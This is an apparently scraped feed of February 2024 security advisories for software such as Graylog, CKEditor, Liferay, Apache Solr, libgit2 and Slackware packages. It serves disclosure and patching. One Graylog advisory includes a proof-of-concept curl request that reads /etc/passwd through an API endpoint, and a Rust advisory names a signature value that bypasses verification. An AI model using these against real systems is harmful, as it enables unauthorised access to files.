https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GFQF-9W98-7JMX

06.02.2024 17:52:35 maven [MAVEN:GHSA-9GP8-6CG8-7H34] Spring Security's spring-security.xsd file is world writable (moderate)

The spring-security.xsd file inside the spring-security-config jar is world writable which means that if it were extracted it could be written by anyone with access to the file system.

While there are no known exploits, this is an example of "CWE-732: Incorrect Permission Assignment for Critical Resource" and could result in an exploit. Users should update to the latest version of Spring Security to mitigate any future exploits found around this issue.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9GP8-6CG8-7H34

06.02.2024 02:00:00 cisa [CISA-2024:0206] CISA Adds One Known Exploited Vulnerability to Catalog
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0206

06.02.2024 19:57:48 rustsec [RUSTSEC-2024-0010] Improper comparison of different-length signatures
The `Webhook::verify` function incorrectly compared signatures of different lengths - the two signatures would only be compared up to the length of the shorter signature. This allowed an attacker to pass in `v1,` as the signature, which would always pass verification.
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0010

06.02.2024 17:40:20 android [ASB-A-230492947] Start foreground activity from background in ActivityTaskManagerService#startNextMatchingActivity (high)
In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible way to bypass the restrictions on starting activities from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
https://secdb.nttzen.cloud/security-advisory/android/ASB-A-230492947

06.02.2024 22:29:20 npm [NPM:GHSA-7XM8-WJQ7-88R5] DeviceFarmer stf uses DES-ECB (critical)
DeviceFarmer stf v3.6.6 suffers from Use of a Broken or Risky Cryptographic Algorithm.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-7XM8-WJQ7-88R5

07.02.2024 22:13:19 slackware [SSA:2024-038-01] expat

New expat packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/expat-2.6.0-i586-1_slack15.0.txz: Upgraded.
  This update fixes security issues:
  Fix quadratic runtime issues with big tokens that can cause denial of service.
  Fix billion laughs attacks for users compiling *without* XML_DTD defined
  (which is not common).
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2023-52425
    https://www.cve.org/CVERecord?id=CVE-2023-52426
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/expat-2.6.0-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/expat-2.6.0-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/expat-2.6.0-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/expat-2.6.0-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
5fc9ee070934b620f18f25589161af50  expat-2.6.0-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
4d154e83a4c7aa16e9ec3b13883d0541  expat-2.6.0-x86_64-1_slack15.0.txz

Slackware -current package:
0a52eddf970a67cde7db5c3e0b22936a  l/expat-2.6.0-i586-1.txz

Slackware x86_64 -current package:
ff61e2750bcbb0ac9255f48be240dd8d  l/expat-2.6.0-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg expat-2.6.0-i586-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-038-01

07.02.2024 20:24:21 maven [MAVEN:GHSA-3XF8-G8GR-G7RH] Graylog session fixation vulnerability through cookie injection (moderate)

### Impact

Reauthenticating with an existing session cookie would re-use that session id, even if for different user credentials.

In this case, the pre-existing session could be used to gain elevated access to an existing Graylog login session, provided the malicious user could successfully inject their session cookie into someone else's browser.

The complexity of such an attack is high, because it requires presenting a spoofed login screen and injection of a session cookie into an existing browser, potentially through an XSS attack. No such attack has been discovered.

### Patches

Graylog 5.1.11 and 5.2.4, and any versions of the 6.0 development branch contain patches to not re-use sessions under any circumstances, making this type of attack impossible.

### Workarounds

Using short session expiration and explicit log outs of unused sessions can help limit the attack vector. Unpatched, this vulnerability exists but is relatively hard to exploit.

A proxy could be leveraged to clear the `authentication` cookie for the Graylog server URL for the `/api/system/sessions` endpoint, as that is the only one vulnerable.

Analysis provided by Fabian Yamaguchi - Whirly Labs (Pty) Ltd

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3XF8-G8GR-G7RH

07.02.2024 22:24:28 maven [MAVEN:GHSA-P6GG-5HF4-4RGJ] Graylog vulnerable to instantiation of arbitrary classes triggered by API request (high)

### Summary

Arbitrary classes can be loaded and instantiated using an HTTP PUT request to the `/api/system/cluster_config/` endpoint.

### Details

Graylog's cluster config system uses fully qualified class names as config keys. To validate the existence of the requested class before using them, Graylog loads the class using the class loader.

https://github.com/Graylog2/graylog2-server/blob/e458db8bf4f789d4d19f1b37f0263f910c8d036c/graylog2-server/src/main/java/org/graylog2/rest/resources/system/ClusterConfigResource.java#L208-L214

### PoC

A request of the following form will output the content of the `/etc/passwd` file:

```
curl -u admin:<admin-password> -X PUT http://localhost:9000/api/system/cluster_config/java.io.File \
  -H "Content-Type: application/json" \
  -H "X-Requested-By: poc" \
  -d '"/etc/passwd"'
```

To perform the request, authorization is required. Only users possessing the `clusterconfigentry:create` and `clusterconfigentry:edit` permissions are allowed to do so. These permissions are usually only granted to `Admin` users.

### Impact

If a user with the appropriate permissions performs the request, arbitrary classes with 1-arg String constructors can be instantiated. This will execute arbitrary code that is run during class instantiation.

In the specific use case of `java.io.File`, the behaviour of the internal web-server stack will lead to information exposure by including the entire file content in the response to the REST request.

### Credits

Analysis provided by Fabian Yamaguchi - Whirly Labs (Pty) Ltd

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P6GG-5HF4-4RGJ

07.02.2024 20:21:06 npm [NPM:GHSA-WH5W-82F3-WRXH] CKEditor cross-site scripting vulnerability in AJAX sample (moderate)

### Affected packages

The vulnerability has been discovered in the AJAX sample available at the `samples/old/ajax.html` file location. All integrators that use that sample in the production code can be affected.

### Impact

A potential vulnerability has been discovered in one of the CKEditor 4 samples that are shipped with production code. The vulnerability allowed JavaScript code to be executed by abusing the AJAX sample. It affects all users using CKEditor 4 at version < 4.24.0-lts where `samples/old/ajax.html` is used in a production environment.

### Patches

The problem has been recognized and patched. The fix will be available in version 4.24.0-lts.

### For more information

Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.

### Acknowledgements

The CKEditor 4 team would like to thank Rafael Pedrero and INCIBE ([original report](https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-cksource-ckeditor)) for recognizing and reporting this vulnerability.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WH5W-82F3-WRXH

07.02.2024 22:24:13 npm [NPM:GHSA-MW2C-VX6J-MG76] CKEditor4 Cross-site Scripting vulnerability in samples with the preview feature enabled (moderate)

### Affected packages

The vulnerability has been discovered in the samples that use the [preview](https://ckeditor.com/cke4/addon/preview) feature:

* `samples/old/**/*.html`
* `plugins/[plugin name]/samples/**/*.html`

All integrators that use these samples in the production code can be affected.

### Impact

A potential vulnerability has been discovered in one of the CKEditor 4 samples that are shipped with production code. The vulnerability allowed JavaScript code to be executed by abusing the misconfigured [preview feature](https://ckeditor.com/cke4/addon/preview). It affects all users using CKEditor 4 at version < 4.24.0-lts with affected samples used in a production environment.

### Patches

The problem has been recognized and patched. The fix will be available in version 4.24.0-lts.

### For more information

Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.

### Acknowledgements

The CKEditor 4 team would like to thank Marcin Wyczechowski & Michał Majchrowicz AFINE Team for recognizing and reporting this vulnerability.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MW2C-VX6J-MG76

07.02.2024 22:23:51 npm [NPM:GHSA-FQ6H-4G8V-QQVM] CKEditor4 Cross-site Scripting vulnerability caused by incorrect CDATA detection (moderate)

### Affected packages

The vulnerability has been discovered in the core HTML parsing module and may affect all editor instances that:

* Enabled [full-page editing](https://ckeditor.com/docs/ckeditor4/latest/features/fullpage.html) mode,
* or enabled [CDATA](https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_dtd.html#property-S-cdata) elements in [Advanced Content Filtering](https://ckeditor.com/docs/ckeditor4/latest/guide/dev_advanced_content_filter.html) configuration (defaults to `script` and `style` elements).

### Impact

A potential vulnerability has been discovered in the CKEditor 4 HTML processing core module. The vulnerability allowed malformed HTML content to be injected, bypassing the Advanced Content Filtering mechanism, which could result in executing JavaScript code. An attacker could abuse faulty CDATA content detection and use it to prepare an intentional attack on the editor. It affects all users using CKEditor 4 at version < 4.24.0-lts.

### Patches

The problem has been recognized and patched. The fix will be available in version 4.24.0-lts.

### For more information

Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.

### Acknowledgements

The CKEditor 4 team would like to thank [Michal Frýba](https://cz.linkedin.com/in/michal-fryba) from [ALEF NULA](https://www.alefnula.com/) for recognizing and reporting this vulnerability.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FQ6H-4G8V-QQVM

07.02.2024 18:00:00 cisco [CISCO-SA-EXPRESSWAY-CSRF-KNNZDMJ3] Cisco Expressway Series Cross-Site Request Forgery Vulnerabilities (critical)

Multiple vulnerabilities in the Cisco Expressway Series could allow an unauthenticated, remote attacker to conduct cross-site request forgery (CSRF) attacks, which could allow the attacker to perform arbitrary actions on an affected device.

Note: Cisco Expressway Series refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices.

For more information about these vulnerabilities, see the Details section of this advisory.

Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.

https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-EXPRESSWAY-CSRF-KNNZDMJ3

07.02.2024 18:00:00 cisco [CISCO-SA-CLAMAV-HDFFU6T] ClamAV OLE2 File Format Parsing Denial of Service Vulnerability (high)

A vulnerability in the OLE2 file format parser of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.

This vulnerability is due to an incorrect check for end-of-string values during scanning, which may result in a heap buffer over-read. An attacker could exploit this vulnerability by submitting a crafted file containing OLE2 content to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to cause the ClamAV scanning process to terminate, resulting in a DoS condition on the affected software and consuming available system resources.

For a description of this vulnerability, see the ClamAV blog (https://blog.clamav.net/2023/11/clamav-130-122-105-released.html).

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CLAMAV-HDFFU6T

07.02.2024 23:21:57 maven [MAVEN:GHSA-9VGQ-W5PV-V77Q] Liferay Portal stored cross-site scripting (XSS) vulnerability (critical)
Stored cross-site scripting (XSS) vulnerability in the Portal Search module's Search Result app in Liferay Portal 7.2.0 through 7.4.3.11, and older unsupported versions, and Liferay DXP 7.4 before update 8, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML into the Search Result app's search result if highlighting is disabled by adding any searchable content (e.g., blog, message board message, web content article) to the application.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9VGQ-W5PV-V77Q

07.02.2024 21:32:24 maven [MAVEN:GHSA-87M3-6QJ3-P3XH] Liferay Portal denial of service (memory consumption) (moderate)
The Document and Media widget in Liferay Portal 7.2.0 through 7.3.6, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 13, and older unsupported versions, does not limit resource consumption when generating a preview image, which allows remote authenticated users to cause a denial of service (memory consumption) via crafted PNG images.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-87M3-6QJ3-P3XH

07.02.2024 21:23:36 maven [MAVEN:GHSA-6726-2RX3-CGWH] Apache Ozone Improper Authentication vulnerability (moderate)

Improper Authentication vulnerability in Apache Ozone.

The vulnerability allows an attacker to download metadata internal to the Storage Container Manager service without proper authentication. The attacker is not allowed to do any modification within the Ozone Storage Container Manager service using this vulnerability. The accessible metadata does not contain sensitive information that can be used to exploit the system later on, and the accessible data does not make it possible to gain access to actual user data within Ozone.

This issue affects Apache Ozone: 1.2.0 and subsequent releases up until 1.3.0.

Users are recommended to upgrade to version 1.4.0, which fixes the issue.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6726-2RX3-CGWH

07.02.2024 20:23:34 maven [MAVEN:GHSA-C57V-4VG5-CM2X] Apache Pulsar SASL Authentication Provider observable timing discrepancy vulnerability (high)

Observable timing discrepancy vulnerability in Apache Pulsar SASL Authentication Provider can allow an attacker to forge a SASL Role Token that will pass signature verification.

Users are recommended to upgrade to version 2.11.3, 3.0.2, or 3.1.1 which fixes the issue. Users should also consider updating the configured secret in the `saslJaasServerRoleTokenSignerSecretPath` file.

Any component matching an above version running the SASL Authentication Provider is affected. That includes the Pulsar Broker, Proxy, Websocket Proxy, or Function Worker.

2.11 Pulsar users should upgrade to at least 2.11.3.
3.0 Pulsar users should upgrade to at least 3.0.2.
3.1 Pulsar users should upgrade to at least 3.1.1.

Any users running Pulsar 2.8, 2.9, 2.10, and earlier should upgrade to one of the above patched versions.

For additional details on this attack vector, please refer to https://codahale.com/a-lesson-in-timing-attacks/ .

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C57V-4VG5-CM2X

07.02.2024 00:17:51 go [GO-2024-2497] Privilege escalation in github.com/moby/buildkit
BuildKit provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if the special security.insecure entitlement is enabled both by buildkitd configuration and allowed by the user initializing the build request.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2497

07.02.2024 00:16:15 alpinelinux [ALPINE:CVE-2024-24575] libgit2 vulnerability
[From CVE-2024-24575] libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_revparse_single` can cause the function to enter an infinite loop, potentially causing a Denial of Service attack in the calling application. The revparse function in `src/libgit2/revparse.c` uses a loop to parse the user-provided spec string. There is an edge-case during parsing that allows a bad actor to force the loop conditions to access arbitrary memory. Potentially, this could also leak memory if the extracted rev spec is reflected back to the attacker. As such, libgit2 versions before 1.4.0 are not affected. Users should upgrade to version 1.6.5 or 1.7.2.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24575

07.02.2024 00:16:15 alpinelinux [ALPINE:CVE-2024-24577] libgit2 vulnerability
[From CVE-2024-24577] libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_index_add` can cause heap corruption that could be leveraged for arbitrary code execution. There is an issue in the `has_dir_name` function in `src/libgit2/index.c`, which frees an entry that should not be freed. The freed entry is later used and overwritten with potentially bad actor-controlled data leading to controlled heap corruption. Depending on the application that uses libgit2, this could lead to arbitrary code execution. This issue has been patched in version 1.6.5 and 1.7.2.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24577

07.02.2024 17:40:16 android [ASB-A-230492947] Start foreground activity from background in ActivityTaskManagerService#startNextMatchingActivity (high)
In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible way to bypass the restrictions on starting activities from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
https://secdb.nttzen.cloud/security-advisory/android/ASB-A-230492947

08.02.2024 22:01:57 msrc [MS:CVE-2024-1284] Chromium: CVE-2024-1284 Use after free in Mojo
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1284

08.02.2024 22:01:52 msrc [MS:CVE-2024-1283] Chromium: CVE-2024-1283 Heap buffer overflow in Skia
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1283

08.02.2024 20:42:14 maven [MAVEN:GHSA-C352-X843-GGPQ] XXL-JOB vulnerable to Server-Side Request Forgery (moderate)
xxl-job <= 2.4.0 has a Server-Side Request Forgery (SSRF) vulnerability, which allows low-privileged users to control the executor and achieve RCE.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C352-X843-GGPQ

08.02.2024 20:31:20 maven [MAVEN:GHSA-QWJ8-QGPR-8CRM] Liferay Portal vulnerable to user impersonation (moderate)
In Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions the `doAsUserId` URL parameter may get leaked when creating linked content using the WYSIWYG editor and while impersonating a user. This may allow remote authenticated users to impersonate a user after accessing the linked content.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QWJ8-QGPR-8CRM

08.02.2024 20:30:37maven[MAVEN:GHSA-MQF8-4CQM-P83X] Liferay Portal allows attackers to discover the existence of sites (moderate)Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 18, and older unsupported versions returns with different responses depending on whether a site does not exist or if the user does not have permission to access the site, which allows remote attackers to discover the existence of sites by enumerating URLs. This vulnerability occurs if locale.prepend.friendly.url.style=2 and if a custom 404 page is used.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MQF8-4CQM-P83X
08.02.2024 20:26:21maven[MAVEN:GHSA-W275-M8CR-HF2V] Liferay Portal denial-of-service vulnerability (moderate)The IFrame widget in Liferay Portal 7.2.0 through 7.4.3.26, and older unsupported versions, and Liferay DXP 7.4 before update 27, 7.3 before update 6, 7.2 before fix pack 19, and older unsupported versions does not check the URL of the IFrame, which allows remote authenticated users to cause a denial-of-service (DoS) via a self referencing IFrame.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W275-M8CR-HF2V
08.02.2024 02:00:00debian[DSA-5618-1] webkit2gtk security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5618-1
08.02.2024 02:00:00debian[DSA-5617-1] chromium security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5617-1
08.02.2024 02:00:00redhat[RHSA-2024:0752] container-tools:rhel8 security update (important)The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc. Security Fix(es): * runc: file descriptor leak (CVE-2024-21626) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0752
08.02.2024 02:00:00redhat[RHSA-2024:0748] container-tools:4.0 security update (important)The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc. Security Fix(es): * runc: file descriptor leak ("Leaky Vessels") (CVE-2024-21626) A Red Hat Security Bulletin which addresses further details about the Leaky Vessels flaw is available in the References section. * golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326) * golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges (CVE-2023-45287) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0748
08.02.2024 17:40:20android[ASB-A-230492947] Start foreground activity from background in ActivityTaskManagerService#startNextMatchingActivity (high)In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible way to bypass the restrictions on starting activities from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.https://secdb.nttzen.cloud/security-advisory/android/ASB-A-230492947
10.02.2024 01:15:08alpinelinux[ALPINE:CVE-2023-6935] wolfssl vulnerability[From CVE-2023-6935] wolfSSL SP Math All RSA implementation is vulnerable to the Marvin Attack, a new variation of a timing Bleichenbacher style attack, when built with the following options to configure: `--enable-all CFLAGS="-DWOLFSSL_STATIC_RSA"`. The define "WOLFSSL_STATIC_RSA" enables static RSA cipher suites, which is not recommended, and has been disabled by default since wolfSSL 3.6.6. Therefore the default build since 3.6.6, even with "--enable-all", is not vulnerable to the Marvin Attack. The vulnerability is specific to static RSA cipher suites, and expected to be padding-independent. The vulnerability allows an attacker to decrypt ciphertexts and forge signatures after probing with a large number of test observations. However, the server's private key is not exposed.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-6935
09.02.2024 23:51:14slackware[SSA:2024-040-01] xpdfNew xpdf packages are available for Slackware 15.0 and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/xpdf-4.05-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: Fixed a bug in the ICCBased color space parser that was allowing the number of components to be zero. Thanks to huckleberry for the bug report. Fixed a bug in the ICCBased color space parser that was allowing the number of components to be zero. Thanks to huckleberry for the bug report. Added checks for PDF object loops in AcroForm::scanField(), Catalog::readPageLabelTree2(), and Catalog::readEmbeddedFileTree(). The zero-width character problem can also happen if the page size is very large -- that needs to be limited too, the same way as character position coordinates. Thanks to jlinliu for the bug report. Add some missing bounds check code in DCTStream. Thanks to Jiahao Liu for the bug report. Fix a deadlock when an object stream's length field is contained in another object stream. Thanks to Jiahao Liu for the bug report. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-2662 https://www.cve.org/CVERecord?id=CVE-2023-2662 https://www.cve.org/CVERecord?id=CVE-2018-7453 https://www.cve.org/CVERecord?id=CVE-2018-16369 https://www.cve.org/CVERecord?id=CVE-2022-36561 https://www.cve.org/CVERecord?id=CVE-2022-41844 https://www.cve.org/CVERecord?id=CVE-2023-2663 https://www.cve.org/CVERecord?id=CVE-2023-2664 https://www.cve.org/CVERecord?id=CVE-2023-3044 https://www.cve.org/CVERecord?id=CVE-2023-3436 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xpdf-4.05-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xpdf-4.05-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/xpdf-4.05-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/xpdf-4.05-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: f7667c53e498407c734c0aa48041b27c xpdf-4.05-i586-1_slack15.0.txz Slackware x86_64 15.0 package: 18ea58703d2516ecac8a126092297d99 xpdf-4.05-x86_64-1_slack15.0.txz Slackware -current package: 20ccc8259c8b7d0c48c857e749766d5f xap/xpdf-4.05-i586-1.txz Slackware x86_64 -current package: 335e2ea6a54d540a95754c619b6a5e3b xap/xpdf-4.05-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg xpdf-4.05-i586-1_slack15.0.txz` https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-040-01
09.02.2024 23:53:15maven[MAVEN:GHSA-37VR-VMG4-JWPW] Apache Solr: Backup/Restore APIs allow for deployment of executables in malicious ConfigSets (moderate)Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of File with Dangerous Type, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Solr. This issue affects Apache Solr from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1. In the affected versions, Solr ConfigSets accepted Java jar and class files to be uploaded through the ConfigSets API. When backing up Solr Collections, these configSet files would be saved to disk when using the LocalFileSystemRepository (the default for backups). If the backup was saved to a directory that Solr uses in its ClassPath/ClassLoaders, then the jar and class files would be available to use with any ConfigSet, trusted or untrusted. When Solr is run in a secure way (Authorization enabled), as is strongly suggested, this vulnerability is limited to extending the Backup permissions with the ability to add libraries. Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue. In these versions, the following protections have been added: * Users are no longer able to upload files to a configSet that could be executed via a Java ClassLoader. * The Backup API restricts saving backups to directories that are used in the ClassLoader.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-37VR-VMG4-JWPW
09.02.2024 23:43:20maven[MAVEN:GHSA-3HWC-RQWP-V36Q] Apache Solr can leak certain passwords due to System Property redaction logic inconsistencies (moderate)Insufficiently Protected Credentials vulnerability in Apache Solr. This issue affects Apache Solr from 6.0.0 through 8.11.2, from 9.0.0 before 9.3.0. One of the two endpoints that publishes the Solr process' Java system properties, /admin/info/properties, was only set up to hide system properties that had "password" contained in the name. There are a number of sensitive system properties, such as "basicauth" and "aws.secretKey", that do not contain "password", thus their values were published via the "/admin/info/properties" endpoint. This endpoint populates the list of System Properties on the home screen of the Solr Admin page, making the exposed credentials visible in the UI. This /admin/info/properties endpoint is protected under the "config-read" permission. Therefore, Solr Clouds with Authorization enabled will only be vulnerable through logged-in users that have the "config-read" permission. Users are recommended to upgrade to version 9.3.0 or 8.11.3, both of which fix the issue. A single option now controls hiding Java system properties for all endpoints, "-Dsolr.hiddenSysProps". By default all known sensitive properties are hidden (including "-Dbasicauth"), as well as any property with a name containing "secret" or "password". Users who cannot upgrade can also use the following Java system property to fix the issue: `-Dsolr.redaction.system.pattern=.*(password|secret|basicauth).*`https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3HWC-RQWP-V36Q
10.02.2024 00:16:48maven[MAVEN:GHSA-4WXW-42WX-2WFX] Apache Solr Schema Designer blindly "trusts" all configsets (low)Incorrect Permission Assignment for Critical Resource, Improper Control of Dynamically-Managed Code Resources vulnerability in Apache Solr. This issue affects Apache Solr from 8.10.0 through 8.11.2, from 9.0.0 before 9.3.0. The Schema Designer was introduced to allow users to more easily configure and test new Schemas and configSets. However, when the feature was created, the "trust" (authentication) of these configSets was not considered. External library loading is only available to configSets that are "trusted" (created by authenticated users), thus non-authenticated users are unable to perform Remote Code Execution. Since the Schema Designer loaded configSets without taking their "trust" into account, configSets that were created by unauthenticated users were allowed to load external libraries when used in the Schema Designer. Users are recommended to upgrade to version 9.3.0 or 8.11.3, both of which fix the issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4WXW-42WX-2WFX
10.02.2024 00:17:03maven[MAVEN:GHSA-XRJ7-X7GP-WWQR] Apache Solr's Streaming Expressions allow users to extract data from other Solr Clouds (low)Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr. This issue affects Apache Solr from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1. Solr Streaming Expressions allows users to extract data from other Solr Clouds, using a "zkHost" parameter. When the original SolrCloud is set up to use ZooKeeper credentials and ACLs, they will be sent to whatever "zkHost" the user provides. An attacker could set up a server to mock ZooKeeper, that accepts ZooKeeper requests with credentials and ACLs and extracts the sensitive information, then send a streaming expression using the mock server's address in "zkHost". Streaming Expressions are exposed via the "/streaming" handler, with "read" permissions. Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue. From these versions on, only zkHost values that have the same server address (regardless of chroot) will use the given ZooKeeper credentials and ACLs when connecting.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XRJ7-X7GP-WWQR
09.02.2024 17:20:28npm[NPM:GHSA-22R3-9W55-CJ54] Pkg Local Privilege Escalation (moderate)### Impact Any native code packages built by `pkg` are written to a hardcoded directory. On unix systems, this is `/tmp/pkg/*`, which is a shared directory for all users on the same local system. There is no uniqueness to the package names within this directory; they are predictable. An attacker who has access to the same local system has the ability to replace the genuine executables in the shared directory with malicious executables of the same name. A user may then run the malicious executable without realising it has been modified. ### Patches This package is deprecated. Therefore, there will not be a patch provided for this vulnerability. ### Recommended Action: To check if your executable built by pkg depends on native code and is vulnerable, run the executable and check if `/tmp/pkg/` was created. Users should transition to actively maintained alternatives. We would recommend investigating Node.js 21's support for [single executable applications](https://nodejs.org/api/single-executable-applications.html). ### Workarounds Given the decision to deprecate the pkg package, there are no official workarounds or remediations provided by our team. Users should prioritize migrating to other packages that offer similar functionality with enhanced security.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-22R3-9W55-CJ54
09.02.2024 17:19:16maven[MAVEN:GHSA-583G-G682-CRXF] Micronaut management endpoints vulnerable to drive-by localhost attack (moderate)### Summary Enabled but unsecured management endpoints are susceptible to drive-by localhost attacks. While not typical of a production application, these attacks may have more impact on a development environment where such endpoints may be flipped on without much thought. ### Details A malicious/compromised website can make HTTP requests to `localhost`. Normally, such requests would trigger a CORS preflight check which would prevent the request; however, some requests are ["simple"](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests) and do not require a preflight check. These endpoints, if enabled and not secured, are vulnerable to being triggered. ### Impact Production environments typically disable unused endpoints and secure/restrict access to needed endpoints. A more likely victim is the developer in their local development host, who has enabled endpoints without security for the sake of easing development.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-583G-G682-CRXF
